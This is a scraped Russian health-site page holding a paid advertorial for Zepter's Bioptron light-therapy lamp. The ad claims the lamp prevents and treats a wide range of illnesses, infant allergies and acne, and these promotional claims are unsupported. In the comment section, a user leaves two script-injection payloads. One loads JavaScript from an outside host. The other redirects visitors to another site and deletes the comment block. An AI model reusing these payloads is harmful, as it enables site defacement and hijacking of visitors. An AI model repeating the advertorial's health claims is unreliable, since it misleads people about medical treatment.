Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Целебное действие света  >>  Целебное действие света
 
Обратная связь
 

Целебное действие света

Размер шрифта
10 апреля 2014 00:00
  • google_analytics: false
  • Нравится

Наш организм постоянно ощущает потребность в тепле и солнечном свете. Недостаток света в определенные временные периоды приводит к серьезным нарушениям в организме, которые выражаются в повышенной утомляемости, вялости и сонливости, снижается наша работоспособность. Но самое главное, что психоэмоциональные нарушения сопровождаются снижением иммунитета, частыми простудами и обострением хронических заболеваний.

Целебное действие света

Немногие знают, что свет обладает лечебными свойствами, и сегодня существует высокотехнологичный и безопасный медицинский прибор Биоптрон, который может восполнить недостаток световой энергии в организме, улучшить самочувствие, укрепить иммунитет.

Действие прибора основано на излучении волн наиболее полезной части солнечного спектра – видимого света и части инфракрасного излучения. Спектр прибора не содержит ультрафиолетовых лучей, тем самым не представляя опасности для глаз и кожи.

Светотерапия эффективна для профилактики и лечения различных заболеваний, для снятия боли различного происхождения, способствует быстрому заживлению ран, защищает от простуды. Для поддержания  здоровья и красоты достаточно применять сеансы светотерапии ежедневно утром и вечером по 4-10 минут. Лечение светом помогает даже при таких проблемах, как бессонница, повышенная утомляемость, стресс.

Женщины оценят преимущества светотерапии в ежедневном уходе за кожей. Конечно, сегодня существует масса косметических средств, призванных сохранить и поддержать красоту. В то же время клетки кожи могут воспринять только малую часть активных ингредиентов. Светотерапия повышает активность клеток и улучшает микроциркуляцию крови. Это значит, что витамины, кислород и другие необходимые компоненты косметических средств будут доставляться к клеткам намного быстрее. При регулярном проведении сеансов светотерапии кожа выглядит здоровой, улучшается ее цвет, текстура, сглаживаются морщины.

Целебное действие света

Светотерапия поддержит и здоровье ребенка с момента его рождения, снимет проявления аллергии, зуд, покраснения кожи, поможет в борьбе с респираторными заболеваниями, а подросткам поможет быстрее справиться с угревой сыпью.

В чем секрет светотерапии, почему она так необходима каждому из нас?

  • Свет улучшает наше самочувствие
  • Свет необходим для поддержания обмена веществ и функционирования всех систем организма
  • Свет регулирует функцию многих гормонов, 20 из которых являются светозависимыми
  • Свет наполняет наш организм энергией
  • Свет укрепляет иммунную систему

Светотерапия Биоптрон относится к методам естественной медицины, которые активируют собственные силы организма. Она поможет всем членам вашей семьи не только поддерживать тонус организма, но и бороться с целым рядом болезней, а также последствиями бытовых травм.

Компания Zepter предлагает различные модели приборов Биоптрон для использования дома, в клиниках, косметических салонах и медицинских центрах. Консультанты компании помогут подобрать прибор, который подходит именно вам.

Специалисты Филатовской больницы, Научного центра здоровья детей РАМН, Российского научного центра Восстановительной медицины и курортологии МЗ РФ, Федерального медико-биологического агентства, Института травматологии и ортопедии им. Вредена и других авторитетных медицинских учреждений дали высокую оценку лечебным свойствам прибора Биоптрон. Одна из примечательных особенностей прибора – компактные размеры и простота в эксплуатации – позволяют использовать его не только в стационаре, но и в домашних условиях. Отныне нет необходимости ехать в клинику или медицинский центр через весь город, тратя на поездку драгоценное время, которого и так всегда не хватает. Этот удивительный прибор должен быть под рукой у любого, кто ценит свое здоровье и здоровье своих близких.

Светотерапия Биоптрон уже применяется в более чем 60 странах мира, она также стала частью повседневной жизни миллионов семей!

Более подробную информацию о характеристиках прибора вы можете узнать на сайте ZEPTER International.

Статья опубликована на правах рекламы
  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

10 апреля 2014 в 23:10

Комментарий удален за нарушение Правил общения

2 - zzzzzz

30 июня 2015 в 18:42

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:41

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Московский музей «Живые системы» приглашает всех   Почему магазины могут обмануть людей, но не обезьян?   Во сколько ложиться спать, чтобы не попасть в аварию? Вы удивитесь!   Как прикорнуть и зарядиться энергией на день  
19 июля 2013У вашего мужа в 3 раза больше шансов совершить самоубийство! А какой шанс у вас? 03 июня 2013Недосып лечит депрессию. Сколько спать, чтобы не сойти с ума?
 
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 

Слайдшоу

1
Как спать с бронхитом
Астма! Когда бежать к врачу?
Как провести день, чтобы выспаться

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.